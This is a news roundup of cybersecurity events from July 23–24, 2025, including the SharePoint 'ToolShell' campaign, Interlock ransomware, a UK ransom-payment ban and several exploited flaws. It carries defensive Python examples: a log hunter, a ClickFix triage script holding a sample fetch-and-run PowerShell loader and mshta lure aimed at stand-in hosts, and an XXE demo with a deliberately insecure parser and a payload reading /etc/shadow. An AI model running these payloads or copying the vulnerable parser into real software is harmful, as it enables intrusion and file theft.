
Cybersecurity Storm: Hacks, Ransomware and Crackdowns Rock the Globe (July 23–24, 2025)

The past two days saw a whirlwind of cybersecurity developments worldwide – from high-stakes cyber-espionage campaigns pivoting to ransomware, to governments launching bold new security initiatives and threat actors facing law enforcement crackdowns. Below is a comprehensive roundup of the major cybersecurity news from July 23–24, 2025, spanning data breaches, ransomware threats, newly disclosed vulnerabilities, and policy shifts.

Chinese Hackers Exploit SharePoint Zero-Day, 400+ Victims and US Agencies Hit

A cyber-espionage campaign exploiting a zero-day vulnerability in on-premises Microsoft SharePoint Server escalated dramatically and now includes ransomware deployment. Microsoft revealed that a group it tracks as “Storm-2603” (assessed to be China-based) has been exploiting a bypass of an incomplete SharePoint patch to compromise systems reuters.com. The exploit chain, dubbed “ToolShell,” is tracked as CVE-2025-53770 (remote code execution) and CVE-2025-53771 (spoofing); both sidestep the fixes Microsoft shipped in its July update for CVE-2025-49704 and CVE-2025-49706. By July 23, at least 400 organizations had been breached, a sharp jump from the 100 victims reported earlier in the week reuters.com. “There are many more, because not all attack vectors have left artifacts that we could scan for,” warned Vaisha Bernard, chief hacker at Eye Security, which first flagged the attacks reuters.com. The campaign struck multiple U.S. government agencies: sources say victims include the Department of Homeland Security, the Department of Energy’s National Nuclear Security Administration, the Department of Education, and the National Institutes of Health securityweek.com. An NIH spokesperson confirmed that one server was compromised and that additional servers were isolated as a precaution reuters.com. The breaches are still being assessed, though the Energy Department noted no evidence of classified data loss securityweek.com. What began as a data-theft operation took a dangerous turn: Microsoft reported that since July 18 the Storm-2603 actors have been seeding ransomware on some hacked SharePoint servers, deploying Warlock and LockBit payloads, potentially to cause disruption alongside espionage securityweek.com. This is a notable escalation, since Chinese state-aligned intrusion sets have rarely used ransomware. Both Microsoft and Google have attributed the SharePoint exploitation to Chinese state-sponsored groups (Microsoft names Linen Typhoon and Violet Typhoon in addition to Storm-2603), but Beijing has denied involvement reuters.com.
Microsoft issued emergency patches for SharePoint Subscription Edition, SharePoint 2019, and SharePoint 2016, but only after attackers had been active since early July securityweek.com; SharePoint Online in Microsoft 365 is not affected. Patching alone is not enough on a server that was already hit: the attackers’ web shell reads the server’s ASP.NET machine keys, which let them forge valid __VIEWSTATE payloads and regain code execution on a patched host, so Microsoft’s guidance is to rotate the machine keys and restart IIS after installing the update. Cybersecurity officials warn organizations to apply the patches immediately and hunt for compromise, given the breadth of the attacks and the addition of ransomware securityweek.com.
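The “hunt for compromise” step above is concrete for ToolShell because the exploit leaves a recognizable request in the IIS logs. The script below is an added example, not code from the article, Microsoft, or Eye Security; it checks IIS W3C log lines for the two publicly documented indicators (a POST to ToolPane.aspx with DisplayMode=Edit and a SignOut.aspx Referer, and any request for the spinstall0.aspx web shell). The sample log lines are constructed for the demo and the host names and addresses are made up.

```python
"""Hunt IIS W3C logs for the ToolShell request pattern.

Added example, not code from the article or from Microsoft/Eye Security.
It encodes two publicly documented indicators of the exploit chain:
  * a POST to /_layouts/15/ToolPane.aspx with DisplayMode=Edit in the
    query string and a Referer of /_layouts/SignOut.aspx (the exploit
    request itself), and
  * any request for spinstall0.aspx, the web shell the attackers drop to
    read the server's ASP.NET machine keys.
The log lines below are constructed for the demo; hosts and IPs are made up.
"""
import re

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-19 03:12:44 10.0.0.5 GET /_layouts/15/start.aspx - 443 alice 10.0.1.20 Mozilla/5.0 https://sp.contoso.local/ 200
2025-07-19 03:12:58 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&PageView=Shared 443 alice 10.0.1.20 Mozilla/5.0 https://sp.contoso.local/SitePages/Home.aspx 200
2025-07-19 03:13:01 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 Mozilla/5.0 https://sp.contoso.local/_layouts/SignOut.aspx 200
2025-07-19 03:13:05 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200
"""

TOOLPANE_RE = re.compile(r"/_layouts/1[56]/toolpane\.aspx$", re.IGNORECASE)
WEBSHELL_RE = re.compile(r"/spinstall0\.aspx$", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per request line, keyed by the #Fields header."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):  # skip malformed lines rather than guess
            continue
        yield dict(zip(fields, parts))


def classify(rec):
    """Return an indicator name for a suspicious request, or None."""
    stem = rec.get("cs-uri-stem", "")
    query = rec.get("cs-uri-query", "").lower()
    referer = rec.get("cs(Referer)", "").lower()
    if WEBSHELL_RE.search(stem):
        return "webshell-request"
    # A legitimate page edit also POSTs to ToolPane.aspx with DisplayMode=Edit;
    # the SignOut.aspx Referer is what distinguishes the exploit request.
    if (rec.get("cs-method") == "POST"
            and TOOLPANE_RE.search(stem)
            and "displaymode=edit" in query
            and referer.endswith("/_layouts/signout.aspx")):
        return "toolshell-exploit-request"
    return None


def find_toolshell_hits(text):
    """Return [{'time', 'client', 'uri', 'indicator'}] for each matching line."""
    hits = []
    for rec in parse_w3c(text):
        indicator = classify(rec)
        if indicator:
            hits.append({
                "time": f"{rec['date']} {rec['time']}",
                "client": rec.get("c-ip"),
                "uri": rec.get("cs-uri-stem"),
                "indicator": indicator,
            })
    return hits


if __name__ == "__main__":
    for hit in find_toolshell_hits(SAMPLE_LOG):
        print(hit)
```

Point it at the real files under the IIS log directory (by default `%SystemDrive%\inetpub\logs\LogFiles\W3SVC*`), and make sure cs(Referer) is among the logged fields, since the exploit check depends on it. An exploit request followed by a request for spinstall0.aspx from the same client is near-certain compromise. No hits is not a clean bill of health: renamed web shells and in-memory payloads leave no such line, which is exactly Bernard’s point above.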

FBI Alert: “Interlock” Ransomware Operation Ramping Up Threats

U.S. agencies issued a joint cybersecurity advisory warning about a rising ransomware threat dubbed “Interlock.” On July 22, the FBI, CISA, HHS, and MS-ISAC published indicators and techniques associated with Interlock ransomware, which has been targeting businesses and critical infrastructure sectors in North America and Europe industrialcyber.co. First observed in late September 2024, Interlock stands out for an uncommon initial access method: “FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups,” the advisory noted industrialcyber.co. The group also relies on the “ClickFix” social engineering technique: a fake browser error, update prompt, or CAPTCHA page copies a command to the clipboard and instructs the user to paste and run it, typically in the Windows Run dialog, so the victim launches the loader themselves industrialcyber.co. Once inside, Interlock operators follow the double-extortion playbook: they exfiltrate data and then encrypt systems, with encryptors aimed at virtual machines while physical hosts and workstations are largely left alone industrialcyber.co. The ransom note supplies a unique code and directs the victim to a Tor (.onion) site rather than stating a demand, moving negotiation into a private channel industrialcyber.co. Security researchers have also observed Interlock dropping information stealers such as Lumma Stealer and Berserk Stealer during its intrusions to harvest credentials scworld.com. The impact on healthcare has been severe: Interlock was behind high-profile ransomware incidents against hospitals, and analysts suspect it may be linked to, or reusing tooling from, the Rhysida ransomware gang scworld.com. The FBI alert comes just days after Japanese authorities released a free decryptor for Phobos ransomware, signaling heightened global efforts against ransomware scworld.com.
Officials urge organizations to shore up defenses: the advisory provides known indicators of compromise and recommends DNS filtering and web access controls to block the drive-by and ClickFix delivery, user training on these prompts, MFA and network segmentation, and offline backups, alongside robust endpoint protection industrialcyber.co.
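The ClickFix step described above leaves a cheap artifact: Explorer records every command typed into the Win+R dialog under the current user’s RunMRU registry key. The script below is an added example, not code from the advisory; it triages RunMRU entries for the hallmarks of a pasted ClickFix loader (LOLBins fetching a remote payload, hidden PowerShell windows, and base64 `-EncodedCommand` blobs, which it decodes before scoring). The sample entries are constructed for the demo and use reserved example domains; the `read_runmru()` helper reads the real key on Windows.

```python
"""Flag ClickFix-style commands in Windows Run-dialog history (RunMRU).

Added example, not code from the advisory. ClickFix lures have the victim
paste a command into Win+R, and Explorer records each Run-dialog command
under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
(values end with a literal "\\1"). The entries below are constructed for the
demo; on a real host use read_runmru() instead.
"""
import base64
import re
import sys

# Heuristics for a pasted loader: LOLBins and PowerShell cmdlets that fetch
# and run remote content, hidden windows, and staging under %TEMP%/AppData.
SUSPICIOUS = [
    (r"\b(mshta|rundll32|regsvr32|certutil|bitsadmin)\b.*https?://", "lolbin-fetch"),
    (r"\b(iex|invoke-expression)\b", "powershell-iex"),
    (r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget)\b.*https?://", "remote-download"),
    (r"-w(indowstyle)?\s+h(idden)?\b", "hidden-window"),
    (r"(\$env:temp|%temp%|\\appdata\\)", "temp-drop"),
]
# PowerShell accepts -e / -ec / -enc / -EncodedCommand followed by base64.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Constructed sample: two benign entries, an mshta lure, and an encoded loader.
PAYLOAD = "iex (irm http://payload.example/verify)"  # stand-in for a real loader
SAMPLE_ENTRIES = [
    "notepad\\1",
    "\\\\fileserver\\share\\1",
    "mshta http://captcha-check.example/verify.hta\\1",
    "powershell -w hidden -enc "
    + base64.b64encode(PAYLOAD.encode("utf-16le")).decode() + "\\1",
]


def decode_encoded_command(cmd):
    """Decode PowerShell's -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", "replace")
    except (ValueError, UnicodeDecodeError):
        return None


def score(cmd):
    """Return the indicator names matched by one Run-dialog command."""
    if cmd.endswith("\\1"):          # strip Explorer's trailing marker
        cmd = cmd[:-2]
    decoded = decode_encoded_command(cmd)
    haystack = cmd + ("\n" + decoded if decoded else "")
    hits = ["encoded-command"] if decoded else []
    for pattern, name in SUSPICIOUS:
        if re.search(pattern, haystack, re.IGNORECASE):
            hits.append(name)
    return hits


def triage(entries):
    """Return [(entry, hits)] for every entry that matched at least one indicator."""
    return [(e, score(e)) for e in entries if score(e)]


def read_runmru():
    """Read the current user's RunMRU values on Windows; [] on other platforms."""
    if sys.platform != "win32":
        return []
    import winreg
    entries, i = [], 0
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, i)
                except OSError:
                    break
                if name != "MRUList" and isinstance(value, str):
                    entries.append(value)
                i += 1
    except OSError:
        pass
    return entries


if __name__ == "__main__":
    for entry, hits in triage(read_runmru() or SAMPLE_ENTRIES):
        print(f"{hits}: {entry}")
```

RunMRU is per user and only covers the Win+R path; lures that tell the victim to paste into a terminal or PowerShell window instead show up in Sysmon process-creation events (parent explorer.exe or cmd.exe, child powershell.exe or mshta.exe with a URL on the command line), where the same `score()` heuristics apply to the command line.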

UK Moves to Ban Ransomware Payments by Critical Services

The United Kingdom unveiled a groundbreaking ransomware countermeasure: a targeted ban on paying ransoms in the public sector and critical national infrastructure. This week the UK government confirmed, in its response to a public consultation, that it will legislate to prohibit public bodies and critical national infrastructure operators (such as the NHS, local councils, schools, and utilities) from meeting hackers’ ransom demands industrialcyber.co. The proposal drew strong support: about 72% of consultation respondents favored a ban, on the reasoning that it cuts off funds to cybercriminals and makes essential services less attractive targets industrialcyber.co. If enacted, it would be the first UK law specifically outlawing ransomware payments industrialcyber.co. Two further measures are planned for organizations outside the ban: a “payment prevention regime” under which a business would have to notify the government before paying, so officials can advise it (for example, that a payment to a sanctioned group would itself be unlawful), and a mandatory reporting requirement for ransomware incidents industrialcyber.co. Security Minister Dan Jarvis emphasized the stakes in a blunt statement: “Ransomware is a predatory crime that puts the public at risk, wrecks livelihoods and threatens the services we depend on. That’s why we’re determined to smash the cyber criminal business model and protect the services we all rely on” industrialcyber.co. Jonathon Ellison, the NCSC’s Director for National Resilience, praised the measures for undermining criminals’ revenue streams, but cautioned that ransomware remains an evolving threat and urged all organizations, including those not covered by the ban, to strengthen their defenses and incident response plans industrialcyber.co. By choking off ransom payouts, UK officials aim to make Britain a less attractive target. The move will spark debate, however: some experts warn that if victims cannot pay, ransomware gangs may shift their pressure to data theft and extortion, and that the ban only works if the services it covers can actually recover from backups without paying.
The UK is proceeding carefully, gathering industry input and pledging guidance to help implement the new rules industrialcyber.co.

White House Launches AI Cybersecurity Strategy to “Win the AI Race”

At the policy level, the White House released “Winning the Race: America’s AI Action Plan” on July 23, with cybersecurity as one of its core themes. The plan outlines more than 90 federal actions to cement U.S. leadership in AI abcnews.go.com. In particular, it emphasizes “secure by design” principles for AI systems used in critical infrastructure and national security cybernewscentre.com. The Department of Homeland Security is directed to issue guidance on AI-specific vulnerabilities and, notably, to establish an AI Information Sharing and Analysis Center (AI-ISAC) dedicated to coordinating threat intelligence on AI-related cyber threats cybernewscentre.com. That would give government and industry a formal channel for sharing warnings about malicious uses of AI, such as AI-driven phishing, automated exploitation, and data poisoning, and for responding quickly. The plan also calls on NIST to incorporate AI into cyber incident response playbooks and on agencies to bring their Chief AI Officers into the handling of cyber incidents cybernewscentre.com. Alongside hardening defenses, the plan is openly competitive in the global tech arena: officials framed it as critical to outpacing China in AI and preventing “Orwellian uses” of AI by adversaries whitehouse.gov. The aggressive pro-innovation slant drew criticism, however. Public Citizen argued the plan “prioritizes corporate profits over public safety” by loosening regulation of AI development abcnews.go.com. Still, cybersecurity leaders broadly welcomed the attention to AI’s security dimension.
They note that as AI is rapidly adopted in finance, healthcare, and government, AI systems themselves become both targets and tools of attack, so initiatives like the AI-ISAC are timely if defenders are to keep pace cybernewscentre.com. The plan was accompanied by three executive orders signed the same day, with further implementing actions expected from agencies in the coming weeks abcnews.go.com.

Australian Regulator Sues Financial Firm After Dark Web Data Leak

In Australia, a major enforcement action underscored the consequences of lax cybersecurity. The Australian Securities and Investments Commission (ASIC) announced on July 22 that it is suing Fortnum Private Wealth, a financial advice company, for allegedly failing to adequately manage cybersecurity risks businessnewsaustralia.com. ASIC’s lawsuit claims Fortnum’s failures led to a series of breaches from 2021 to 2023, including a cyberattack that ended with the personal data of approximately 9,828 clients being published on the dark web businessnewsaustralia.com. According to the filings, Fortnum introduced only a basic cybersecurity policy in April 2021 and did not enforce even minimal security training or requirements across its network of authorized representatives businessnewsaustralia.com. Multiple warning signs were ignored: the firm suffered at least five cyber incidents in 2021–2022 (email account compromises and phishing attacks on its affiliate practices), yet failed to strengthen its defenses businessnewsaustralia.com. The final blow came in September 2022, when attackers breached a Fortnum affiliate (Wealthwise) and exfiltrated 200 GB of sensitive client data, later dumping it online businessnewsaustralia.com. Exposed information included identification documents, tax file numbers, and financial account details businessnewsaustralia.com, a ready-made kit for identity fraud. ASIC argues that Fortnum fell below its legal obligations as a licensed financial services provider and is seeking penalties and court orders businessnewsaustralia.com. “Fortnum’s alleged failure to adequately manage cybersecurity risks exposed the company, its representatives and their clients to an unacceptable level of risk,” said ASIC Chair Joe Longo, emphasizing that companies entrusted with confidential data must be held accountable businessnewsaustralia.com.
This is only ASIC’s second court action brought purely over cybersecurity obligations, following its 2022 case against RI Advice, and it puts Australian businesses on notice that regulators no longer treat cybersecurity as just an IT issue: it is now a boardroom liability. The lawsuit’s outcome will be closely watched, as it may set a precedent for how regulators penalize companies for data breaches caused by poor security practices businessnewsaustralia.com.

Europol Busts Administrator of Major Cybercrime Forum

A coordinated law enforcement operation has taken down a kingpin of the cybercriminal underground. Ukrainian police, working with French investigators and Europol, arrested an individual in Kyiv suspected of being the administrator of XSS.is, one of the world’s largest Russian-language hacking forums reuters.com. Announced July 23, the arrest followed a complex investigation led by French cybercrime units in cooperation with Europol. The unnamed suspect is accused of running XSS for years and amassing over €7 million in illicit profits reuters.com. “The forum’s administrator was not only a technical operator but is believed to have played a central role in enabling criminal activity,” Europol said in a statement reuters.com. Acting as a “trusted third party,” the admin allegedly arbitrated disputes between cybercriminals, provided escrow services for transactions, and operated a private encrypted messaging service (“thesecure.biz”) catering to criminals reuters.com. The XSS forum, with over 50,000 registered users, has for roughly a decade served as a bustling marketplace for stolen data, malware, ransomware negotiation services, and hacking tools reuters.com. It is infamous as a hub where ransomware affiliates find partners and breach data is bought and sold, so shutting it down strikes a significant blow to that ecosystem. The suspect was detained by the Ukrainian cyber police as he crossed from Slovakia into Ukraine, according to Europol’s account reuters.com. This high-profile bust continues a run of international crackdowns on cybercrime forums, from the Genesis Market takedown in 2023 to the BreachForums arrests earlier this year. Cybersecurity experts say disrupting these forums creates turmoil for criminals, forcing them to scatter to smaller, less trusted platforms, albeit often only temporarily. Europol highlighted that intelligence from this operation will lead to further investigations and arrests.
For now, the raid sends a clear message: even anonymous dark web operators can be unmasked and brought to justice when global authorities coordinate resources.

Critical Vulnerabilities Under Active Exploitation (Cisco ISE & SysAid)

Several newly disclosed software vulnerabilities grabbed attention as attackers rushed to exploit them and authorities sounded alarms. Cisco warned on July 22 that attackers are actively targeting three maximum-severity flaws in its Identity Services Engine (ISE) network access control product bleepingcomputer.com. The vulnerabilities, CVE-2025-20281, CVE-2025-20282, and CVE-2025-20337, are all rated CVSS 10.0 and allow an unauthenticated remote attacker to execute code as root on ISE and ISE-PIC appliances bleepingcomputer.com; in other words, an external attacker can take over an unpatched ISE deployment without credentials. Cisco’s advisory lists the 3.3 and 3.4 release trains as affected, with fixes delivered as patch releases in late June and mid-July bleepingcomputer.com, and the company now confirms it “became aware of attempted exploitation… in the wild” on July 21 bleepingcomputer.com. Exploit details are scarce and there are no workarounds, and the risk is compounded by what ISE does: it holds the policies and credentials that decide which users and devices may join the network, so a compromised ISE node is a natural pivot point into the rest of the enterprise bleepingcomputer.com. Meanwhile, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two critical vulnerabilities in SysAid On-Premises, a widely used IT helpdesk product, to its Known Exploited Vulnerabilities catalog after finding evidence of active exploitation thehackernews.com. CVE-2025-2775 and CVE-2025-2776 are XML External Entity (XXE) injection bugs, that is, improper handling of XML input, that can be abused before authentication to read arbitrary files from the server, including data that enables administrator account takeover thehackernews.com. Chained with other weaknesses, they can lead to remote code execution.
SysAid patched the issues in On-Premises version 24.4.60, released in March 2025 thehackernews.com, but organizations that have not applied it remain exposed. CISA has given U.S. federal agencies until August 12 to remediate the SysAid bugs, a signal that the threat is concrete rather than hypothetical thehackernews.com. Once a vulnerability is disclosed and patched, attackers routinely diff the fix to build an exploit, which appears to be what happened here. The lesson for defenders is unchanged: keep internet-facing and identity-critical systems current, because attackers read vendor bulletins as closely as you do.
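To make the SysAid bug class concrete, the block below is an added example, not SysAid’s code (SysAid is a Java product; this demonstrates XML External Entity injection on Python’s expat binding). `parse_insecure()` does what a naive parser does when it honours `<!ENTITY … SYSTEM "…">`: it fetches the referenced resource and splices it into the document, which is how an XXE flaw becomes an arbitrary file read. `parse_hardened()` refuses any DOCTYPE and any entity declaration, which is the same policy defusedxml applies to the standard-library parsers. The XML document and the file contents are constructed for the demo.

```python
"""XXE: an external-entity-resolving parser beside a hardened one.

Added example, not SysAid's code. The document below is constructed for the
demo; the hardened parser's policy (no DTD, no entities at all) is the one
to apply to any XML accepted from the network.
"""
import xml.parsers.expat as expat

XXE_DOC = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE checkin [<!ENTITY ext SYSTEM "file:///etc/shadow">]>'
    "<checkin><hostname>&ext;</hostname></checkin>"
)
CLEAN_DOC = "<checkin><hostname>ws-042</hostname></checkin>"


class XmlRejected(ValueError):
    """Raised by the hardened parser when a document carries a DTD."""


def read_local_file(uri):
    """Default resolver for the insecure parser: a plain local file read."""
    path = uri[len("file://"):] if uri.startswith("file://") else uri
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()


def parse_insecure(doc, resolve=read_local_file):
    """Return the document's text content, resolving external entities.

    resolve(system_id) is called for every external entity reference and
    whatever it returns is parsed as part of the document: the XXE sink.
    """
    text = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = text.append

    def fetch_external(context, base, system_id, public_id):
        child = parser.ExternalEntityParserCreate(context)
        child.CharacterDataHandler = text.append
        child.Parse(resolve(system_id), True)
        return 1  # non-zero tells expat the entity was handled

    parser.ExternalEntityRefHandler = fetch_external
    parser.Parse(doc, True)
    return "".join(text)


def parse_hardened(doc):
    """Return the document's text content; raise XmlRejected on any DTD.

    Rejecting the DOCTYPE up front closes external entities, parameter
    entities and entity-expansion (billion laughs) in one check.
    """
    text = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject(*_):
        raise XmlRejected("DTD / entity declarations are not accepted")

    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject
    parser.ExternalEntityRefHandler = reject
    parser.CharacterDataHandler = text.append
    parser.Parse(doc, True)
    return "".join(text)


if __name__ == "__main__":
    fake_fs = lambda uri: "root:x:0:0:root:/root:/bin/bash"  # stands in for the file
    print("insecure:", parse_insecure(XXE_DOC, resolve=fake_fs))
    print("hardened:", parse_hardened(CLEAN_DOC))
    try:
        parse_hardened(XXE_DOC)
    except XmlRejected as exc:
        print("hardened:", exc)
```

The same policy in a Java stack, which is what a product like SysAid runs on, is the `disallow-doctype-decl` feature on the `DocumentBuilderFactory` or `SAXParserFactory`, with `external-general-entities` and `external-parameter-entities` disabled as a fallback where a DTD must be tolerated.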

Major Data Breach Hits European Hospital Network

Another significant breach came to light as AMEOS Group, a major Swiss-headquartered healthcare network, disclosed a cyberattack that may have exposed large volumes of sensitive data. AMEOS operates over 100 hospitals and clinics across Switzerland, Germany, and Austria, with 18,000 employees serving thousands of patients bleepingcomputer.com bleepingcomputer.com. On July 22, the company announced that despite “extensive security measures,” external hackers gained unauthorized access to its IT systems and likely accessed confidential information bleepingcomputer.com. Data potentially compromised includes patient medical details, employee records, and partner company contacts – essentially any personal data stored in AMEOS’s network bleepingcomputer.com. “Data belonging to patients, employees, and partners… may have been affected due to unauthorized access,” the breach notification stated bleepingcomputer.com. AMEOS has shut down all IT systems as a precaution, severing internal and external network connections, and engaged external forensic experts to investigate bleepingcomputer.com. So far there is no indication that stolen data has been leaked or sold online, and the organization says it has no evidence of any ransomware payload being used bleepingcomputer.com bleepingcomputer.com. Notably, no known ransomware group has claimed responsibility, leaving the attackers’ identity and motive unclear bleepingcomputer.com. The incident, which actually occurred on July 7 but was revealed publicly on the 22nd, has been reported to data protection regulators and law enforcement bleepingcomputer.com bleepingcomputer.com. AMEOS is advising all patients and staff to remain vigilant against potential phishing or fraud attempts using their data bleepingcomputer.com. 
This breach highlights the continued danger facing the healthcare sector globally – hospitals remain prime targets for cybercriminals due to the wealth of personal and medical data they hold, and the potential pressure to pay ransom to restore services. European healthcare providers, in particular, have suffered a string of attacks in recent years, prompting authorities to call for stronger cyber defenses in critical services. The AMEOS incident will likely reignite discussions on requiring higher cybersecurity standards and transparency in the healthcare industry, much as recent attacks have done in the U.S. and elsewhere.


Each of these stories from July 23–24, 2025, showcases a different facet of today’s cybersecurity landscape: state-backed hacking campaigns morphing into ransomware havoc, governments adopting tougher stances on cybercrime, threat actors exploiting newly revealed cracks in our software, and global efforts to disrupt the criminal infrastructure that enables attacks. It’s a stark reminder that cybersecurity is truly a 24/7 global battle – with critical developments unfolding even over a 48-hour span. Staying informed and proactive is essential as organizations and individuals alike navigate the risks ahead.

Sources: reuters.com, securityweek.com, industrialcyber.co, scworld.com, abcnews.go.com, cybernewscentre.com, whitehouse.gov, businessnewsaustralia.com, bleepingcomputer.com, thehackernews.com
